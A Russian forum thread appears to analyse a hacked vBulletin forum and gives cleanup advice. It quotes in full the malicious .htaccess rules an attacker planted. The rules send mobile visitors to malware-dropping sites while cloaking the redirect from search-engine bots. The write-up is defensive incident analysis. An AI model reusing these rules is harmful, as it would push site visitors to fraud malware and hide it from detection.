Взлом vBulletin через htaccess

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Еще одна тема обзора уязвимостей, с которой столкнулся совсем недавно. Это взлом воблы и перенаправление трафика через .htaccess.

Первый признак, что с вашим форумом что-то не так - это исчезновение трафика с Яндекса.

Чтобы кто ни говорил, а именно Яндекс реагирует самый первый, если ваш форум заболел.

Итак, мы имеем пациента vBulletin 3.8.5 с установленным и пропатченным vbSEO. Форум хостится на шаред хостинге в Германии, и Яндекс обнаружил на форуме вредоносный код.

Интересный момент:
Сегодня проверка Яндекса вредоносный код показывает, завтра видит форум чистым. И так несколько раз подряд.

Что же на самом деле случилось с форумом, и почему он "угрожает безопасности вашего компьютера"? Именно такая надпись появляется, если просто забить URL в поисковую строку Яндекса.

Беглый обзор файлов в файловой системе по последним изменениям не дал ничего интересного. Все изменения были произведены достаточно давно: в феврале, а то еще и позже, но просмотр .htaccess в корневой папке показал, что туда злоумышленник прописал следующие строки:

Код:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://get.loadfilemobile.ru/?go&source=вашсайт.ru [L,R=302] # on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://uploads-xxx.ru/?8&source=вашсайт.ru [L,R=302] # On

То есть в результате мы имеем следующее. При посещении вашего форума с компьютера не происходит абсолютно ничего. Как только пользователь переходит с мобильного устройства, его с вашего форума перекидывает на те пару сайтов, что мы видим в коде выше.


Теперь немного отвлечемся и я вкратце расскажу зачем это кому-то нужно.

Собственно сам ваш форум никому не нужен. Злоумышленнику важен трафик вашего форума, и если он достаточно большой, и если ваш форум посещают часто с мобильных устройств, то для них это золотое дно. Пользователь, зайдя на ваш форум со смартфона, вместо общения с вашими пользователями попадает на левый сайт, который предлагает, например обновить флэш плеер, или что-то еще. После обновления у вас на мобильном устройстве появляется вирус, который списывает деньги со счета. В одних случаях это немного, в других порядка 490 руб и выше. 490 руб это средняя планка.

В некоторых случаях сам взлом происходит через уязвимости самого движка, хаков, модулей и тд. Как мы помним истории периодически потрясают Рунет. Например, пациент мог быть вполне взломан во время той истории https://lumtu.com/uyazvimosti-vbulletin/2530-naidena-uyazvimost-vbseo.html , и как выяснилось пропатчен форум был не до конца. Но, существует и иной вариант.

Многие форумы хостятся на шаред хостинге. То есть получается что на одном сервере уютно живет множество сайтов. 200, 300 и более. Все сайты разные, работают на самых разных движках, защищенных и нет, и если хостер не очень сильно заботится о безопасности, то через уязвимость на одном из них злоумышленник получает доступ к phpMyAdmin.
Лично у меня были несколько случаев взлома сайтов через Директ Админ.

Как лечить?

  • Проверить наличие изменений в файловой системе по дате. Если изменения есть, но вы ничего не меняли, заменить файлы из дистрибутива.

  • Проверить исходный код страницы форума на наличие сторонних скриптов, или непонятного кода.

  • В данном случае проверить ВСЕ файлы .htaccess форума. Как правило они изменяются все.


  • Сменить пароли на FTF, пароли базы данных, пароли панели управления хостинга, админские пароли.

Возможно сменить хостинг.
 

Прометей

Пользователь
Регистрация
15.08.12
Сообщения
913
Реакции
211
Баллы
29
Спасибо, хорошая статья. Сам столкнулся с этим полтора года тому назад. Было всё так, как Вы пишите: человек пытался зайти на форум с мобильного устройства и его просили обновить флеш плеер. Скачав файл js и запустив его он потерял 500 руб. При анализе были обнаружены изменения в файлах хотгагес.
 

Статистика форума

Темы
200.635
Сообщения
380.523
Пользователи
327.876
Новый пользователь
pm1199
Сверху Снизу